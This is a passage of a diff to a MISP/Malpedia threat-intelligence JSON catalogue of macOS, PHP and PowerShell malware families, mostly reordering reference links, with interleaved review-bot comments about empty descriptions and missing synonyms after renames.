"https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", 
"https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468", - "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html" + "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] @@ -9499,8 +9921,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://news.drweb.com/show/?i=1750&lng=en&c=14" + "https://news.drweb.com/show/?i=1750&lng=en&c=14", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [], "type": [] @@ -9513,9 +9935,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.orat", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt", "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", "https://www.sentinelone.com/blog/from-the-front-lines-unsigned-macos-orat-malware-gambles-for-the-win/", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt", "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf" ], "synonyms": [], 
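Review bot: The new NetWire entry at the top of this hunk is added with `"description": ""` and the bare `"value": "NetWire"`, whereas the other macOS-specific clusters touched by this commit (GIMMICK here, RustBucket at @@ -9656) get an `(OS X)` suffix on their value; if the galaxy already holds a Windows NetWire cluster, two entries with the identical value will be ambiguous for any name-based lookup, which I cannot confirm from this chunk. For consistency with those renames, `"value": "NetWire (OS X)"` together with `"synonyms": ["NetWire"]` would keep both names resolvable. A one-sentence description grounded in the Intego ref, e.g. `"description": "macOS build of the NetWire RAT, whose infrastructure was shut down by the FBI (see the Intego ref)."` (constructed wording), would also avoid shipping yet another empty description.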
@@ -9554,7 +9976,7 @@
 "value": "Patcher"
 },
 {
- "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.",
+ "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized",
@@ -9571,10 +9993,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit",
- "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
- "https://forensicitguy.github.io/analyzing-pirrit-adware-installer/",
- "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf",
 "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
+ "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf",
+ "https://forensicitguy.github.io/analyzing-pirrit-adware-installer/",
+ "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [],
@@ -9588,8 +10010,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.poolrat",
+ "https://www.3cx.com/blog/news/mandiant-security-update2/",
 "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
- "https://www.3cx.com/blog/news/mandiant-security-update2/"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment"
 ],
 "synonyms": [],
 "type": []
@@ -9602,15 +10025,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat",
- "https://objective-see.com/blog/blog_0x1F.html",
- "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
- "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
- "https://securelist.com/calisto-trojan-for-macos/86543/",
 "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
- "https://objective-see.com/blog/blog_0x1D.html",
- "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf",
+ "https://securelist.com/calisto-trojan-for-macos/86543/",
+ "https://objective-see.com/blog/blog_0x1F.html",
+ "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
+ "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
+ "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
 "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
- "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/"
+ "https://objective-see.com/blog/blog_0x1D.html",
+ "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf"
 ],
 "synonyms": [
 "Calisto"
@@ -9638,10 +10061,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe",
- "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/",
 "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
- "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
- "https://www.govcert.admin.ch/blog/33/the-retefe-saga"
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
+ "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/",
+ "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe"
 ],
 "synonyms": [
 "Retefe"
@@ -9656,29 +10079,32 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.rustbucket",
+ "https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/",
+ "https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket",
+ "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html",
 "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "03f356e6-296f-4195-bed0-9719a84887db",
- "value": "RustBucket"
+ "value": "RustBucket (OS X)"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Shlayer is a trojan-type virus designed to proliferate various adware and other unwanted applications, and promote fake search engines. It is typically disguised as a Adobe Flash Player installer and various software cracking tools.\r\n\r\nIn most cases, users encounter this virus when visiting dubious Torrent websites that are full of intrusive advertisements and deceptive downloads.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
- "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
- "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
- "https://objective-see.com/blog/blog_0x64.html",
- "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
 "https://securelist.com/shlayer-for-macos/95724/",
+ "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/",
+ "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
+ "https://objective-see.com/blog/blog_0x64.html",
+ "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/"
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -9687,7 +10113,7 @@
 "value": "Shlayer"
 },
 {
- "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.",
+ "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow",
@@ -9722,8 +10148,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd",
 "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
- "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en",
- "https://securelist.com/windealer-dealing-on-the-side/105946/"
+ "https://securelist.com/windealer-dealing-on-the-side/105946/",
+ "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
 ],
 "synonyms": [
 "Demsty",
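Review bot: Renaming the cluster `value` from `RustBucket` to `RustBucket (OS X)` while the entry's `synonyms` stays `[]` means anything that referenced this entry by its bare display name (MISP tags of the form `misp-galaxy:malpedia="RustBucket"`, presumably, and any correlation on the name) no longer resolves to it. Keeping the uuid `03f356e6-...` is the right way to rename, but the old name should be carried as an alias: `"synonyms": ["RustBucket"]`. The new Shlayer description embeds literal `\r\n\r\n` and the PCrisk wording `a Adobe Flash Player installer`; if this file is regenerated from Malpedia, as the verbatim "According to PCrisk" text suggests, that wording fix belongs upstream rather than in this generated JSON.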
@@ -9753,7 +10179,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001",
 "https://objective-see.com/blog/blog_0x51.html",
- "https://securelist.com/operation-applejeus-sequel/95596/"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c",
+ "https://securelist.com/operation-applejeus-sequel/95596/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment"
 ],
 "synonyms": [],
 "type": []
@@ -9766,10 +10194,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.update_agent",
+ "https://twitter.com/sysopfb/status/1532442456343691273",
 "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
- "https://www.jamf.com/blog/updateagent-adapts-again/",
 "https://www.esentire.com/blog/updateagent-macos-malware",
- "https://twitter.com/sysopfb/status/1532442456343691273"
+ "https://www.jamf.com/blog/updateagent-adapts-again/"
 ],
 "synonyms": [],
 "type": []
@@ -9782,8 +10210,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos",
- "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/",
- "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/"
+ "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/",
+ "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/"
 ],
 "synonyms": [],
 "type": []
@@ -9797,8 +10225,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram",
 "https://twitter.com/ConfiantIntel/status/1351559054565535745",
- "https://twitter.com/MsftSecIntel/status/1451279679059488773",
- "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/"
+ "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/",
+ "https://twitter.com/MsftSecIntel/status/1451279679059488773"
 ],
 "synonyms": [
 "WizardUpdate"
@@ -9813,8 +10241,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat",
- "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
- "https://objective-see.com/blog/blog_0x5F.html"
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/"
 ],
 "synonyms": [],
 "type": []
@@ -9829,10 +10257,10 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail",
 "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
 "https://objective-see.com/blog/blog_0x3B.html",
- "https://objective-see.com/blog/blog_0x3D.html",
- "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf",
- "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/",
 "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf",
+ "https://objective-see.com/blog/blog_0x3D.html",
+ "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/",
 "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/"
 ],
 "synonyms": [],
@@ -9859,8 +10287,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf",
- "https://objective-see.com/blog/blog_0x16.html"
+ "https://objective-see.com/blog/blog_0x16.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -9873,9 +10301,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14",
+ "https://objective-see.com/blog/blog_0x43.html",
 "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
- "https://objective-see.com/blog/blog_0x43.html"
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14"
 ],
 "synonyms": [],
 "type": []
@@ -9889,8 +10317,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent",
 "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf",
 "https://twitter.com/PhysicalDrive0/status/845009226388918273",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf",
 "https://www.secureworks.com/research/threat-profiles/iron-twilight"
 ],
 "synonyms": [],
@@ -9904,13 +10332,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
- "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
 "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
+ "https://objective-see.com/blog/blog_0x5F.html",
 "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html",
 "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/",
+ "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
 "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/",
- "https://objective-see.com/blog/blog_0x5F.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/"
 ],
 "synonyms": [],
@@ -9924,17 +10352,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader",
+ "https://twitter.com/krabsonsecurity/status/1319463908952969216",
+ "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
+ "https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
 "https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/",
- "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
+ "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
 "https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/",
 "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/",
- "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
 "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/",
 "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://twitter.com/krabsonsecurity/status/1319463908952969216",
+ "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
 "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/"
 ],
 "synonyms": [
@@ -10008,9 +10437,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak",
- "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx"
+ "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx",
+ "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html"
 ],
 "synonyms": [],
 "type": []
@@ -10023,9 +10452,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.aspxspy",
- "https://attack.mitre.org/groups/G0096",
 "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells",
- "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
+ "https://attack.mitre.org/groups/G0096"
 ],
 "synonyms": [],
 "type": []
@@ -10038,9 +10467,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.behinder",
+ "https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/",
 "https://blog.gigamon.com/2022/09/28/investigating-web-shells/",
- "https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md",
- "https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/"
+ "https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md"
 ],
 "synonyms": [],
 "type": []
@@ -10068,10 +10497,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode",
- "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
 "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf",
- "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a"
+ "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a",
+ "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -10094,6 +10523,22 @@
 "uuid": "dfd8deac-ce86-4a22-b462-041c19d62506",
 "value": "Ensikology"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/php.p0wnyshell",
+ "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/"
+ ],
+ "synonyms": [
+ "Ponyshell",
+ "Pownyshell"
+ ],
+ "type": []
+ },
+ "uuid": "a6d13ffe-1b1a-46fe-afd9-989e8dec3773",
+ "value": "p0wnyshell"
+ },
 {
 "description": "In combination with Parrot TDS the usage of a classical web shell was observed by DECODED Avast.io.",
 "meta": {
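Review bot: The new p0wnyshell entry is added with `"description": ""` although it cites two references, so an analyst who sees this cluster attached to an event gets no summary of what the tool is. The Malpedia identifier `php.p0wnyshell` and the cited Microsoft Cadet Blizzard write-up support a one-line description such as `"description": "PHP web shell; the referenced Microsoft report documents its use by Cadet Blizzard."` — confirm the wording against the sources before committing. If descriptions are imported from Malpedia and this one is empty upstream, the fix belongs in the upstream entry so it survives the next regeneration.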
@@ -10112,11 +10557,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas",
- "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
 "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
- "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html",
- "https://securelist.com/apt-trends-report-q1-2021/101967/"
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
+ "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
 ],
 "synonyms": [],
 "type": []
@@ -10198,19 +10643,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
- "https://ironnet.com/blog/chirp-of-the-poisonfrog/",
- "https://www.netscout.com/blog/asert/tunneling-under-sands",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/",
- "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933",
+ "https://ironnet.com/blog/chirp-of-the-poisonfrog/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/",
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://www.netscout.com/blog/asert/tunneling-under-sands",
 "https://nsfocusglobal.com/apt34-event-analysis-report/",
- "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/"
+ "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
 ],
 "synonyms": [
 "Glimpse",
@@ -10240,11 +10685,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower",
- "https://vblocalhost.com/uploads/VB2020-46.pdf",
- "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
 "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf",
+ "https://vblocalhost.com/uploads/VB2020-46.pdf"
 ],
 "synonyms": [
 "BoBoStealer"
@@ -10272,13 +10717,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode",
- "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities",
- "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/",
+ "https://www.certego.net/en/news/malware-tales-ftcode/",
 "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md",
- "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm",
 "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/",
 "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://www.certego.net/en/news/malware-tales-ftcode/"
+ "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities",
+ "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm",
+ "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/"
 ],
 "synonyms": [],
 "type": []
@@ -10307,9 +10752,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader",
 "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html",
- "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines",
+ "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html",
 "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html"
+ "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines"
 ],
 "synonyms": [],
 "type": []
@@ -10335,8 +10780,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot",
- "https://twitter.com/VK_Intel/status/1329511151202349057",
- "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/"
+ "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
+ "https://twitter.com/VK_Intel/status/1329511151202349057"
 ],
 "synonyms": [],
 "type": []
@@ -10349,11 +10794,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus",
